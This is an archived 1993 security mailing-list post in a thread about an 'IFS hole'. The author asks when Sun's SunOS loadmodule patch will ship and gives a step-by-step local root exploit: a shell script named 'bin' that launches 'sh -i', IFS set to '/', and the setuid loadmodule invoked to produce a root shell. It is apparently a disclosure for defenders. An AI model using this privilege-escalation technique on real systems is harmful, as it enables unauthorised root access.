Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email email@example.com
Re: IFS hole?mark kraitchman (kraitchEECS.Berkeley.EDU)
Wed, 15 Dec 1993 09:49:04 -0800
- Messages sorted by: [ date ][ thread ][ subject ][ author ]
- Next message: henry strickland: "Re: IFS hole?"
- Previous message: Rik Farrow: "Re: packet logs"
- Next in thread: Greg Woods: "Re: IFS hole?"
In Message-Id: <9312151103.AA10103ramon.bgu.ac.il> jszramon.bgu.ac.il (Yonathan) writes how to get root using /usr/local/bin/sysinfo (which I don't have) and the IFS bug. What I am wondering, is how long it will be before Sun officially releases the sun4 patch for SunOS 4.1.x loadmodule (100448-02)? I thought the patch was going to be released yesterday? Here is yet another `how-to' example about the importance of IFS in setuid root programs. %cat >~/bin/bin #!/bin/sh sh -i ^D %chmod 755 ~/bin/bin %setenv IFS / %cd ~/bin %/usr/openwin/bin/loadmodule /sys/sun4c/OBJ/evqmod-sun4c.o /etc/openwin/modules/evqload # whoami root